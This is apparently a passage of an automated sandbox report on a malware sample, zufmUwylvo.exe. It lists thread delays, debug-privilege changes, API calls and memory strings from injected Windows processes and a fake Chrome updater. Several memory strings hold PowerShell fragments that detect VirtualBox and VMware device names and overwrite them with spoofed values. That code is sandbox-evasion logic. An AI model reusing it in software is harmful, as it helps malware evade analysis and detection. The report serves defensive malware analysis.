Source: C:\Program Files\Google\Chrome\updater.exe	API coverage: 1.4 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.9 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1704	Thread sleep count: 5793 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1708	Thread sleep count: 4068 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1836	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dialer.exe TID: 2796	Thread sleep count: 133 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3960	Thread sleep count: 7258 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4292	Thread sleep count: 2395 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4272	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 5024	Thread sleep count: 3082 > 30
Source: C:\Windows\System32\winlogon.exe TID: 5024	Thread sleep time: -3082000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 5024	Thread sleep count: 6916 > 30
Source: C:\Windows\System32\winlogon.exe TID: 5024	Thread sleep time: -6916000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 4812	Thread sleep count: 9816 > 30
Source: C:\Windows\System32\lsass.exe TID: 4812	Thread sleep time: -9816000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 4812	Thread sleep count: 145 > 30
Source: C:\Windows\System32\lsass.exe TID: 4812	Thread sleep time: -145000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4140	Thread sleep count: 238 > 30
Source: C:\Windows\System32\svchost.exe TID: 4140	Thread sleep time: -238000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 4932	Thread sleep count: 9863 > 30
Source: C:\Windows\System32\dwm.exe TID: 4932	Thread sleep time: -9863000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4920	Thread sleep count: 250 > 30
Source: C:\Windows\System32\svchost.exe TID: 4920	Thread sleep time: -250000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4928	Thread sleep count: 250 > 30
Source: C:\Windows\System32\svchost.exe TID: 4928	Thread sleep time: -250000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4868	Thread sleep count: 248 > 30
Source: C:\Windows\System32\svchost.exe TID: 4868	Thread sleep time: -248000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1812	Thread sleep count: 130 > 30
Source: C:\Windows\System32\svchost.exe TID: 1812	Thread sleep time: -130000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6764	Thread sleep count: 237 > 30
Source: C:\Windows\System32\svchost.exe TID: 6764	Thread sleep time: -237000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3196	Thread sleep count: 186 > 30
Source: C:\Windows\System32\svchost.exe TID: 3196	Thread sleep time: -186000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7532	Thread sleep count: 66 > 30
Source: C:\Windows\System32\svchost.exe TID: 7532	Thread sleep time: -66000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5464	Thread sleep count: 234 > 30
Source: C:\Windows\System32\svchost.exe TID: 5464	Thread sleep time: -234000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5508	Thread sleep count: 237 > 30
Source: C:\Windows\System32\svchost.exe TID: 5508	Thread sleep time: -237000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5516	Thread sleep count: 231 > 30
Source: C:\Windows\System32\svchost.exe TID: 5516	Thread sleep time: -231000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5276	Thread sleep count: 233 > 30
Source: C:\Windows\System32\svchost.exe TID: 5276	Thread sleep time: -233000s >= -30000s

Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC6038BE3C FindFirstFileExW,	27_2_000001FC6038BE3C
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C737BE3C FindFirstFileExW,	30_2_00000161C737BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91EBE3C FindFirstFileExW,	31_2_00000233B91EBE3C
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_000002109192BE3C FindFirstFileExW,	32_2_000002109192BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E99BE3C FindFirstFileExW,	33_2_000002062E99BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8DABE3C FindFirstFileExW,	34_2_00000282B8DABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B934BE3C FindFirstFileExW,	34_2_00000282B934BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_000002285734BE3C FindFirstFileExW,	35_2_000002285734BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000018F9CD0BE3C FindFirstFileExW,	36_2_0000018F9CD0BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_00000207BAC3BE3C FindFirstFileExW,	37_2_00000207BAC3BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_000001FBDB9CBE3C FindFirstFileExW,	38_2_000001FBDB9CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_0000016F9CA0BE3C FindFirstFileExW,	39_2_0000016F9CA0BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A0183BE3C FindFirstFileExW,	40_2_0000027A0183BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A01BDBE3C FindFirstFileExW,	40_2_0000027A01BDBE3C
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_0082BE3C FindFirstFileExW,	45_2_0082BE3C
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_00B9BE3C FindFirstFileExW,	45_2_00B9BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B26BE3C FindFirstFileExW,	47_2_000002992B26BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B2CBE3C FindFirstFileExW,	47_2_000002992B2CBE3C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: svchost.exe, 00000028.00000000.1781303200.00000279FF02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2674951045.00000279FF02B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: zufmUwylvo.exe	Binary or memory string: XFOWUPCyHNrsvMcI
Source: powershell.exe, 00000018.00000002.1729262490.0000014DC5E89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: svchost.exe, 00000028.00000000.1784373597.00000279FFAEB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: LSI_SASVMware Virtual disk 6000c291b7e1a50751cfe2d9fbbfd342
Source: lsass.exe, 0000001E.00000000.1704100963.00000161C6489000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 00000028.00000000.1781336626.00000279FF043000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmci
Source: svchost.exe, 00000028.00000000.1784373597.00000279FFAEB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: svchost.exe, 00000025.00000002.2688937576.00000207BAA17000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 00000028.00000000.1784373597.00000279FFAEB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 00000028.00000000.1784373597.00000279FFAEB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.40.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: Microsoft-Windows-WER-PayloadHealth%4Operational.evtx.40.dr	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000028.00000000.1784373597.00000279FFAEB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.40.dr	Binary or memory string: VMwareVirtual disk6000c291b7e1a50751cfe2d9fbbfd3420
Source: powershell.exe, 00000018.00000002.1729262490.0000014DC5E89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.40.dr	Binary or memory string: VMwareVirtual disk2.06000c291b7e1a50751cfe2d9fbbfd342PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.40.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.40.dr	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: zufmUwylvo.exe, 00000000.00000002.1708686700.000001B66B715000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: svchost.exe, 00000028.00000003.1806330865.0000027A0161C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: lsass.exe, 0000001E.00000000.1703801936.00000161C6413000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2666809138.00000161C6413000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000000.1710882143.00000233B8613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2666216265.00000233B8613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.2660994017.00000282B862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000022.00000000.1756349909.00000282B862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1757429020.000002285662A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.2656104921.000002285662A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000002.2669160855.00000207B9A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000000.1763262951.00000207B9A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2675637008.00000279FF043000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 0000001F.00000002.2666216265.00000233B8613000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.40.dr	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: lsass.exe, 0000001E.00000000.1704100963.00000161C6489000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 00000028.00000000.1784373597.00000279FFAEB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicVMware Virtual disk 6000c291b7e1a50751cfe2d9fbbfd342
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.40.dr	Binary or memory string: VMwareVirtual disk6000c291b7e1a50751cfe2d9fbbfd3428
Source: svchost.exe, 00000028.00000000.1784373597.00000279FFAEB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: zufmUwylvo.exe	Binary or memory string: eNjOMSCRTKjHGfsZ
Source: lsass.exe, 0000001E.00000000.1704100963.00000161C6489000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicshutdownLMEM XlH
Source: powershell.exe, 00000018.00000002.1729262490.0000014DC5E89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.40.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: lsass.exe, 0000001E.00000000.1704100963.00000161C6489000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: svchost.exe, 00000028.00000003.1806330865.0000027A0161C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 00000028.00000000.1784373597.00000279FFAEB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000023.00000002.2653801149.0000022856600000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 0000001E.00000000.1704100963.00000161C6489000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 00000028.00000003.1806330865.0000027A0161C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: eplace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.40.dr	Binary or memory string: VMware
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.40.dr	Binary or memory string: VMware Virtual disk 2.0 6000c291b7e1a50751cfe2d9fbbfd342PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000028.00000000.1781187667.00000279FEFD0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c291b7e1a50751cfe2d9fbbfd342
Source: svchost.exe, 00000028.00000003.1806330865.0000027A0161C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 00000028.00000003.1806330865.0000027A0161C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 00000020.00000002.2698656098.000002108CDB0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000k
Source: dwm.exe, 00000020.00000000.1719874755.000002108CE10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000028.00000003.1806330865.0000027A0161C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))

Source: C:\Windows\System32\dialer.exe

API call chain: ExitProcess graph end node

graph_22-490

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\winlogon.exe

Code function: 27_2_000001FC6038B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

27_2_000001FC6038B50C

Source: C:\Windows\System32\dialer.exe

Code function: 22_2_00007FF723DE2CC0 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,SleepEx,

22_2_00007FF723DE2CC0

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files\Google\Chrome\updater.exe	Process token adjusted: Debug

Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC6038B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_000001FC6038B50C
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC60387E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_000001FC60387E70
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C737B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_00000161C737B50C
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C7377E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_00000161C7377E70
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91EB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_00000233B91EB50C
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91E7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_00000233B91E7E70
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_000002109192B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_000002109192B50C
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_0000021091927E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_0000021091927E70
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E99B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_000002062E99B50C
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E997E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_000002062E997E70
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8DA7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_00000282B8DA7E70
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8DAB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_00000282B8DAB50C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B9347E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_00000282B9347E70
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B934B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_00000282B934B50C
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_000002285734B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	35_2_000002285734B50C
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000022857347E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	35_2_0000022857347E70
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000018F9CD0B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_0000018F9CD0B50C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000018F9CD07E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_0000018F9CD07E70
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_00000207BAC3B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_00000207BAC3B50C
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_00000207BAC37E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_00000207BAC37E70
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_000001FBDB9C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_000001FBDB9C7E70
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_000001FBDB9CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_000001FBDB9CB50C
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_0000016F9CA0B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_0000016F9CA0B50C
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_0000016F9CA07E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_0000016F9CA07E70
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A0183B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_0000027A0183B50C
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A01837E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_0000027A01837E70
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A01BDB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_0000027A01BDB50C
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A01BD7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_0000027A01BD7E70
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_0082B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_0082B50C
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_00827E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_00827E70
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_00B9B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_00B9B50C
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_00B97E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_00B97E70
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B267E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	47_2_000002992B267E70
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B26B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	47_2_000002992B26B50C
